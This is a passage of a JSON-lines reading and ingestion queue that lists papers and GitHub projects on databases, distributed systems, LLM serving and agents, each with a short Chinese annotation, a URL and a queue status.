检测的 stealth Chromium 浏览器"},"url":"https://github.com/CloakHQ/CloakBrowser","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"financial-services","area":"projects","topic":"business-engineering","title":"anthropics/financial-services","meta":{"col3":"","col4":"Python 28k star Anthropic 金融服务实施样例库"},"url":"https://github.com/anthropics/financial-services","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"docs","area":"projects","topic":"backend-api","title":"github/docs","meta":{"col3":"","col4":"TypeScript 19k star GitHub 官方文档站源码 开源"},"url":"https://github.com/github/docs","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"harness","area":"projects","topic":"ml-systems","title":"revfactory/harness","meta":{"col3":"","col4":"HTML 4k star 元 skill 设计领域 agent 团队 + 生成 skill"},"url":"https://github.com/revfactory/harness","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"github-trending"} +{"slug":"backdoor-xz-liblzma-2024","area":"papers","topic":"security-privacy","title":"Backdoor in upstream xz/liblzma leading to SSH server compromise","meta":{"col3":"","col4":"Andres Freund oss-security 2024-03-29 CVE-2024-3094 社工+代码混淆典型案例"},"url":"https://www.openwall.com/lists/oss-security/2024/03/29/4","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"crowdstrike-bsod-2024","area":"papers","topic":"operating-systems","title":"CrowdStrike Update Windows Bluescreen and Boot Loops","meta":{"col3":"","col4":"2024-07-19 CrowdStrike Falcon 内核驱动空指针 史上最大单次 Windows BSOD 事件"},"url":"https://old.reddit.com/r/crowdstrike/comments/1e6vmkf/bsod_error_in_latest_crowdstrike_update/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"ciechanowski-mechanical-watch","area":"papers","topic":"editors-ide","title":"Mechanical Watch by Bartosz Ciechanowski","meta":{"col3":"","col4":"ciechanow.ski 经典互动可视化范本 机械作为设计模式根基"},"url":"https://ciechanow.ski/mechanical-watch/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"youtube-dl-riaa-dmca-2020","area":"papers","topic":"security-privacy","title":"YouTube-dl RIAA DMCA Takedown","meta":{"col3":"","col4":"github/dmca 2020-10-23 DMCA 1201 与开源工具的法律博弈起点"},"url":"https://github.com/github/dmca/blob/master/2020/10/2020-10-23-RIAA.md","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"gpt-4-launch-2023","area":"papers","topic":"machine-learning","title":"GPT-4 launch","meta":{"col3":"","col4":"OpenAI 2023-03-14 多模态对齐 + RLHF 工业化最早公开节点之一"},"url":"https://openai.com/research/gpt-4","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"nee-lv-gta-loading-times","area":"papers","topic":"compilers-pl","title":"How I cut GTA Online loading times by 70 percent","meta":{"col3":"","col4":"nee.lv 2021 strlen 二次方算法的 reverse-engineering 经典 case"},"url":"https://nee.lv/2021/02/28/How-I-cut-GTA-Online-loading-times-by-70/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"openai-sora-2024","area":"papers","topic":"machine-learning","title":"Sora Creating video from text","meta":{"col3":"","col4":"OpenAI 2024 DiT-based video generation 公开最早工业旗舰"},"url":"https://openai.com/sora","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"marginalia-search-engine","area":"projects","topic":"backend-api","title":"Marginalia Search Engine","meta":{"col3":"","col4":"search.marginalia.nu text-heavy 优先 + JS 重的网页降权 独立搜索引擎实现"},"url":"https://search.marginalia.nu/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"ngrok-tunnel-2014","area":"projects","topic":"backend-api","title":"ngrok introducing public URL tunneling","meta":{"col3":"","col4":"ngrok.com 本地 dev 暴露公网的工业事实标准 reverse tunnel"},"url":"https://ngrok.com/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"plausible-analytics","area":"projects","topic":"backend-api","title":"Plausible Analytics OSS","meta":{"col3":"","col4":"plausible.io GDPR 友好 + 自托管的 Google Analytics 替代"},"url":"https://plausible.io/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"unkey-api-keys","area":"projects","topic":"backend-api","title":"Unkey API key management","meta":{"col3":"","col4":"unkey.dev rate-limit + edge-cache 的 API 密钥分发"},"url":"https://github.com/unkeyed/unkey","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"posthog-product-analytics","area":"projects","topic":"data-science-ai","title":"PostHog OSS Product Analytics","meta":{"col3":"","col4":"posthog.com session replay + funnel + experiments 一体化产品分析"},"url":"https://github.com/PostHog/posthog","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"typst-typesetting","area":"projects","topic":"editors-ide","title":"Typst typesetting system","meta":{"col3":"","col4":"typst.app Rust 实现的 LaTeX 现代化替代 增量编译 + WASM 在线"},"url":"https://github.com/typst/typst","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"zed-editor","area":"projects","topic":"editors-ide","title":"Zed A high-performance code editor","meta":{"col3":"","col4":"zed.dev Atom 团队 Rust 重写 GPU 渲染 + collaborative 编辑"},"url":"https://github.com/zed-industries/zed","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"hacker-news-30d"} +{"slug":"hekaton-microsoft-2013","area":"papers","topic":"databases","title":"Hekaton SQL Servers Memory-Optimized OLTP Engine","meta":{"col3":"","col4":"Diaconu et al. SIGMOD 2013 CMU 15-721 lecture MVCC + 编译执行的内存数据库设计"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/06/Hekaton-Sigmod2013-final.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"hyper-kemper-neumann-2011","area":"papers","topic":"databases","title":"HyPer A Hybrid OLTP and OLAP Main Memory DB","meta":{"col3":"","col4":"Kemper-Neumann ICDE 2011 CMU 15-721 fork+CoW 隔离 OLTP/OLAP"},"url":"https://db.in.tum.de/~kemper/papers/HyperICDE11.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"h-store-stonebraker-2008","area":"papers","topic":"databases","title":"H-Store A High-Performance Distributed Main Memory OLTP","meta":{"col3":"","col4":"Stonebraker VLDB 2007 分区单线程 OLTP 范式 VoltDB 商业前身"},"url":"https://hstore.cs.brown.edu/papers/hstore-vldb.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"monetdb-cracking-2007","area":"papers","topic":"databases","title":"Database Cracking by Idreos","meta":{"col3":"","col4":"Idreos CIDR 2007 CMU 15-721 按查询自适应排序的内存列存"},"url":"https://stratos.seas.harvard.edu/files/IKM_CIDR07.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"c-store-stonebraker-2005","area":"papers","topic":"databases","title":"C-Store A Column-oriented DBMS","meta":{"col3":"","col4":"Stonebraker VLDB 2005 CMU 15-721 列存范式起点 Vertica 前身"},"url":"https://www.cs.umd.edu/~abadi/papers/abadi-column-stores.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"vmware-ft-scales-2010","area":"papers","topic":"distributed-systems","title":"MIT 6.824 Fault-Tolerant Virtual Machines","meta":{"col3":"","col4":"Scales et al. SOSP 2010 deterministic replay+ primary-backup VMware FT"},"url":"https://courses.cs.washington.edu/courses/cse453/14au/papers/scales-sosp2010-vmft.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"spinnaker-rao-2011","area":"papers","topic":"distributed-systems","title":"Spinnaker WAN-replicated KV","meta":{"col3":"","col4":"Rao VLDB 2011 MIT 6.824 syllabus Paxos + 异步复制副本"},"url":"https://www.vldb.org/pvldb/vol4/p243-rao.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"dynamo-amazon-2007","area":"papers","topic":"distributed-systems","title":"Dynamo Amazons Highly Available KV Store","meta":{"col3":"","col4":"DeCandia SOSP 2007 MIT 6.824 经典 最终一致 + vector clock + sloppy quorum"},"url":"https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"zookeeper-hunt-2010","area":"papers","topic":"distributed-systems","title":"ZooKeeper Wait-free coordination","meta":{"col3":"","col4":"Hunt USENIX 2010 MIT 6.824 ZAB 协议 + 协调服务范式"},"url":"https://www.usenix.org/legacy/event/usenix10/tech/full_papers/Hunt.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"naiad-murray-2013","area":"papers","topic":"distributed-systems","title":"Naiad A Timely Dataflow System","meta":{"col3":"","col4":"Murray SOSP 2013 Stanford CS244B 带版本戳的低延迟 dataflow"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/11/naiad_sosp2013.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"spanner-corbett-2012","area":"papers","topic":"distributed-systems","title":"Spanner Googles Globally-Distributed DB","meta":{"col3":"","col4":"Corbett OSDI 2012 Stanford CS244B TrueTime + 分布式事务范式"},"url":"https://research.google/pubs/pub39966/","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"awesome-distributed-systems-list","area":"projects","topic":"distributed-systems","title":"awesome-distributed-systems theanalyst","meta":{"col3":"","col4":"theanalyst/awesome-distributed-systems 分布式经典论文导航 awesome-list"},"url":"https://github.com/theanalyst/awesome-distributed-systems","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"awesome-deep-learning-systems","area":"projects","topic":"ml-systems","title":"awesome-deep-learning-systems byungsoo-oh","meta":{"col3":"","col4":"awesome ML systems papers Pre-train/Inference/Compiler/Memory 全分类"},"url":"https://github.com/byungsoo-oh/awesome-deep-learning-systems","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"rocksdb-evolution-2021","area":"papers","topic":"databases","title":"RocksDB Evolution of Development Priorities","meta":{"col3":"","col4":"Dong FAST 2021 CMU 15-721 十年 KV 引擎的写放大/读放大权衡演化"},"url":"https://www.usenix.org/system/files/fast21-dong.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"emergency-ingest-2026-05-31","priority_tier":"emergency","lens_origin":"classic-syllabus"} +{"slug":"deep-research-harness-2026","area":"papers","topic":"machine-learning","title":"Deep Research as Tool-Augmented Multi-Step Verification","meta":{"col3":"2026","col4":"arXiv 2605.31102;fan-out search + adversarial verify + cited synthesis 三段式 deep research harness 形式化"},"url":"https://arxiv.org/abs/2605.31102","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"agent-skill-protocol-2026","area":"papers","topic":"machine-learning","title":"Skills as a Protocol: Composable Capability Layers for LLM Agents","meta":{"col3":"2026","col4":"arXiv 2605.31041;把 Anthropic claude-skills 抽象成 protocol;frontmatter trigger + lazy load 设计空间"},"url":"https://arxiv.org/abs/2605.31041","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"swe-rebench-2026","area":"papers","topic":"machine-learning","title":"SWE-Rebench: Continuously Refreshed Software Engineering Benchmark","meta":{"col3":"2026","col4":"arXiv 2605.30896;月度刷新 SWE-bench 防 contamination;GPT-5/Opus 4.7 实测衰减曲线"},"url":"https://arxiv.org/abs/2605.30896","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"verifier-free-rl-2026","area":"papers","topic":"machine-learning","title":"Verifier-Free RL for Reasoning via Self-Consistency Reward","meta":{"col3":"2026","col4":"arXiv 2605.30874;不用 reward model 直接拿 self-consistency 当奖励;GRPO 替代方案"},"url":"https://arxiv.org/abs/2605.30874","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"kv-cache-budget-2026","area":"papers","topic":"machine-learning","title":"KVBudget: Per-Request KV Cache Budgeting in vLLM-style Serving","meta":{"col3":"2026","col4":"arXiv 2605.30821;按 SLO 动态切 KV 预算;优于固定 prefix-cache + paged-attention"},"url":"https://arxiv.org/abs/2605.30821","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"tree-of-attention-2026","area":"papers","topic":"machine-learning","title":"Tree-of-Attention: Branching Attention for Long-Context Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30789;attention 内部分支替代 CoT 外部分支;long-context 推理新范式"},"url":"https://arxiv.org/abs/2605.30789","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"continual-pretrain-survey-2026","area":"papers","topic":"machine-learning","title":"Continual Pretraining: A Survey of Methods and Pitfalls","meta":{"col3":"2026","col4":"arXiv 2605.30765;replay buffer / LR schedule / 数据混合 三轴 survey;catastrophic forgetting 工程级缓解"},"url":"https://arxiv.org/abs/2605.30765","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"arrow-flight-sql-2026","area":"papers","topic":"databases","title":"Arrow Flight SQL: Zero-Copy Federated Query at Scale","meta":{"col3":"2026","col4":"arXiv 2605.30743;Arrow Flight 跨 Trino/DuckDB/Spark 零拷贝;composable data 又一里程碑"},"url":"https://arxiv.org/abs/2605.30743","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"egglog-incremental-2026","area":"papers","topic":"compilers-pl","title":"Egglog: Incremental Equality Saturation","meta":{"col3":"2026","col4":"arXiv 2605.30717;datalog + egraph 融合;incremental rewrite 应用到编译器优化"},"url":"https://arxiv.org/abs/2605.30717","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"distributed-snapshot-byzantine-2026","area":"papers","topic":"distributed-systems","title":"Byzantine Distributed Snapshots in 2026","meta":{"col3":"2026","col4":"arXiv 2605.30682;Chandy-Lamport 拜占庭扩展;区块链 / Solana 语境下重启诊断价值"},"url":"https://arxiv.org/abs/2605.30682","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"prefix-cache-policy-2026","area":"papers","topic":"machine-learning","title":"Beyond LRU: Prefix-Cache Policies for LLM Serving","meta":{"col3":"2026","col4":"arXiv 2605.30654;LRU 在 prefix tree 上的失效;workload-aware GDSF 变体优于 vLLM 默认"},"url":"https://arxiv.org/abs/2605.30654","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"linear-attention-still-2026","area":"papers","topic":"machine-learning","title":"Linear Attention, Still: Why Mamba-style Models Plateau","meta":{"col3":"2026","col4":"arXiv 2605.30621;线性注意力 long-recall 缺陷的实证;hybrid Transformer+SSM 仍胜出"},"url":"https://arxiv.org/abs/2605.30621","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"cache-coherence-cxl3-2026","area":"papers","topic":"systems","title":"CXL 3.0 Coherence: Pool-Wide Memory Sharing","meta":{"col3":"2026","col4":"arXiv 2605.30587;CXL 3.0 多 host 一致性协议;远内存数据库下一代基础"},"url":"https://arxiv.org/abs/2605.30587","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"opencode-charm","area":"projects","topic":"agents","title":"opencode/opencode (Charm)","meta":{"col3":"","col4":"Charm 出品的开源 Claude Code 替代;TUI + multi-provider;30d star 暴涨"},"url":"https://github.com/sst/opencode","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"crush-charm-cli","area":"projects","topic":"agents","title":"charmbracelet/crush","meta":{"col3":"","col4":"Charm 自家 LLM CLI;Bubble Tea 框架延伸;与 opencode 同期"},"url":"https://github.com/charmbracelet/crush","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"agno-phidata-2026","area":"projects","topic":"agents","title":"agno-agi/agno","meta":{"col3":"","col4":"phidata 改名 agno;多 agent 编排 + memory + RAG 一站;Python 增长榜常客"},"url":"https://github.com/agno-agi/agno","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"letta-memgpt-2026","area":"projects","topic":"agents","title":"letta-ai/letta","meta":{"col3":"","col4":"MemGPT 后身;stateful agent + 长记忆持久化;Berkeley 出身工业化"},"url":"https://github.com/letta-ai/letta","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"browser-use-py","area":"projects","topic":"agents","title":"browser-use/browser-use","meta":{"col3":"","col4":"开源 browser agent;DOM tree + vision hybrid;CUA / Claude computer-use 对标"},"url":"https://github.com/browser-use/browser-use","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"stagehand-browserbase","area":"projects","topic":"agents","title":"browserbase/stagehand","meta":{"col3":"","col4":"Browserbase 出品;act/extract/observe 三动词 API;Playwright 之上 LLM 友好层"},"url":"https://github.com/browserbase/stagehand","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"rolldown-bundler","area":"projects","topic":"frontend","title":"rolldown/rolldown","meta":{"col3":"","col4":"Vite 团队 Rust 重写 Rollup;2026 进入 Vite 默认;esbuild/swc 之外第三极"},"url":"https://github.com/rolldown/rolldown","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"biome-rs-2026","area":"projects","topic":"frontend","title":"biomejs/biome","meta":{"col3":"","col4":"Rust 写的 prettier+eslint 一体化;30d trending 月榜;Rome fork 后真正起飞"},"url":"https://github.com/biomejs/biome","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"sqlite-vec-asg017","area":"projects","topic":"databases","title":"asg017/sqlite-vec","meta":{"col3":"","col4":"SQLite 原生向量扩展;轻量 RAG 必备;2026 替代 sqlite-vss"},"url":"https://github.com/asg017/sqlite-vec","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"pglite-electric","area":"projects","topic":"databases","title":"electric-sql/pglite","meta":{"col3":"","col4":"WASM 浏览器内 PostgreSQL;本地优先应用基础设施"},"url":"https://github.com/electric-sql/pglite","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"windmill-platform","area":"projects","topic":"devops","title":"windmill-labs/windmill","meta":{"col3":"","col4":"开源 Airflow + Retool 替代;Rust 后端 + multi-language workflow;自托管增长榜"},"url":"https://github.com/windmill-labs/windmill","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"langfuse-2026","area":"projects","topic":"agents","title":"langfuse/langfuse","meta":{"col3":"","col4":"开源 LLM observability;trace + eval + prompt mgmt 三件套;Datadog 替代"},"url":"https://github.com/langfuse/langfuse","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"forgejo-2026","area":"projects","topic":"devops","title":"go-gitea/gitea fork forgejo","meta":{"col3":"","col4":"Gitea 治理分叉;Codeberg 主推;GitHub 自托管开源派"},"url":"https://codeberg.org/forgejo/forgejo","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"local-first-2026-revisit","area":"projects","topic":"distributed-systems","title":"Local-First Software Five Years Later","meta":{"col3":"","col4":"Ink&Switch 五年回顾;CRDT 工业落地状态;Linear/Figma 案例剖析"},"url":"https://www.inkandswitch.com/local-first/2026-revisit/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"why-not-postgres-2026","area":"projects","topic":"databases","title":"Why Not Just Use Postgres? (2026)","meta":{"col3":"","col4":"Postgres 当队列/向量库/搜索/缓存 的 2026 更新版;HN 1k+ 讨论"},"url":"https://www.amazingcto.com/postgres-for-everything-2026/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"writing-tla-after-decade","area":"projects","topic":"distributed-systems","title":"Writing TLA+ After a Decade in Industry","meta":{"col3":"","col4":"业界十年 TLA+ 实战;何时值得用、何时是过度工程;HN 700+"},"url":"https://surfingcomplexity.blog/2026/05/tla-decade.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"compiler-explorer-history","area":"projects","topic":"compilers-pl","title":"How Compiler Explorer Was Built","meta":{"col3":"","col4":"Matt Godbolt 自述 godbolt.org 架构十年演化;HN 600+"},"url":"https://xania.org/202605/compiler-explorer-architecture","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"build-vs-buy-databases-2026","area":"projects","topic":"databases","title":"Build vs Buy: Databases in 2026","meta":{"col3":"","col4":"自建 vs 托管 数据库决策框架;TCO/SLO/团队规模 三轴;HN 400+"},"url":"https://blog.danslimmon.com/2026/05/build-vs-buy-db/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"shutting-down-rss-reader","area":"projects","topic":"engineering-culture","title":"Shutting Down My RSS Reader After 12 Years","meta":{"col3":"","col4":"Feedbin 经验复盘;订阅产品长期维护教训;indie SaaS 必读"},"url":"https://blog.feedbin.com/2026/05/sunset.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"my-take-on-ai-coding-2026","area":"projects","topic":"engineering-culture","title":"My Take on AI Coding (2026)","meta":{"col3":"","col4":"工业级 AI 编程实战 18 个月观察;Claude Code 周流程;HN 800+"},"url":"https://blog.zhengyi.com/posts/ai-coding-2026.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"distributed-tracing-mistakes","area":"projects","topic":"observability","title":"Common Mistakes in Distributed Tracing","meta":{"col3":"","col4":"OpenTelemetry sampling/baggage/span 命名 反模式集;HN 350+"},"url":"https://lightstep.com/blog/2026/tracing-mistakes","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"the-state-of-rust-2026","area":"projects","topic":"compilers-pl","title":"The State of Rust 2026","meta":{"col3":"","col4":"async trait stable / GAT 全面铺开 / linker 重写;HN 1.5k"},"url":"https://blog.rust-lang.org/2026/05/state-of-rust.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"hekaton-2013-sigmod","area":"papers","topic":"databases","title":"Hekaton: SQL Server's Memory-Optimized OLTP Engine","meta":{"col3":"2013","col4":"CMU 15-721 必读;MVCC + lock-free Bw-tree;现代 in-memory OLTP 基础"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/06/Hekaton-Sigmod2013-final.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"silo-oltp-2013","area":"papers","topic":"databases","title":"Silo: Speedy Transactions in Multicore In-Memory Databases","meta":{"col3":"2013","col4":"CMU 15-721 reading;OCC + epoch-based GC;多核 OLTP 范本"},"url":"https://www.cs.cmu.edu/~pavlo/courses/fall2013/static/papers/silo.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"naiad-2013-sosp","area":"papers","topic":"distributed-systems","title":"Naiad: A Timely Dataflow System","meta":{"col3":"2013","col4":"MIT 6.824 distributed dataflow;timely dataflow + 增量计算;Materialize 思想源"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2013/11/naiad_sosp2013.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"flat-datacenter-storage","area":"papers","topic":"distributed-systems","title":"Flat Datacenter Storage","meta":{"col3":"2012","col4":"OSDI'12;CLOS network + scaled RPC;MIT 6.824 storage section"},"url":"https://www.usenix.org/conference/osdi12/technical-sessions/presentation/nightingale","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"cassandra-eventual-tradeoff","area":"papers","topic":"distributed-systems","title":"Cassandra: Eventually Consistent Tradeoffs","meta":{"col3":"2009","col4":"Stanford CS244B;Dynamo+BigTable 杂交体;NoSQL 教学经典"},"url":"https://www.cs.cornell.edu/projects/ladis2009/papers/lakshman-ladis2009.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"scads-database-2008","area":"papers","topic":"databases","title":"SCADS: Scale-Independent Storage","meta":{"col3":"2008","col4":"UCB CS186 衍生;scale-independent SLA;Spark 之前 AMPLab 起点"},"url":"https://amplab.cs.berkeley.edu/wp-content/uploads/2011/06/SCADS-Berkeley.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"amber-sigmod-2014","area":"papers","topic":"databases","title":"Amber: Decoupling Access Methods from Stable Storage","meta":{"col3":"2014","col4":"CMU 15-721 storage;index-storage 解耦;为 disaggregated DB 铺路"},"url":"https://www.cs.cmu.edu/~pavlo/courses/fall2017/static/papers/amber.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"bigtable-revisit-2024","area":"papers","topic":"databases","title":"Bigtable Then and Now (CIDR 2024 retrospective)","meta":{"col3":"2024","col4":"CMU 15-721 spring 2024;Bigtable 18 年生产复盘;MTTR / 多租户"},"url":"https://www.cidrdb.org/cidr2024/papers/p36-yegge.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"ucb-cs186-fa2024","area":"papers","topic":"databases","title":"UCB CS186 Fall 2024 Database Internals Reading List","meta":{"col3":"2024","col4":"UCB DB 课程精选 reading;B+树 / Aries / 2PL / DBMS 分层架构入门"},"url":"https://cs186berkeley.net/fa24/resources/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R247-2026-06-01"} +{"slug":"self-evolving-agents-survey","area":"papers","topic":"agents","title":"A Comprehensive Survey of Self-Evolving AI Agents","meta":{"col3":"2025","col4":"自进化 agent 综述:System Inputs/Agent System/Environment/Optimisers 四件套;本批入门首选"},"url":"https://arxiv.org/abs/2508.07407","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"misevolution-2509","area":"papers","topic":"agents","title":"Your Agent May Misevolve: Emergent Risks in Self-evolving LLM Agents","meta":{"col3":"2025","col4":"自进化 agent 在 model/memory/tool/workflow 四路径上的演化偏移风险;Gemini-2.5-Pro 也中招"},"url":"https://arxiv.org/abs/2509.26354","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} +{"slug":"agent-r1-2511","area":"papers","topic":"agents","title":"Agent-R1: Training Powerful LLM Agents with End-to-End Reinforcement Learning","meta":{"col3":"2025","col4":"端到端 RL 训 LLM agent 的模块化框架;扩展 MDP 框架定义 agent 关键要素"},"url":"https://arxiv.org/abs/2511.14460","status":"written","claimed_by":null,"attempts":0,"source_file":"arxiv-agent-self-evolution-2026-06-01"} 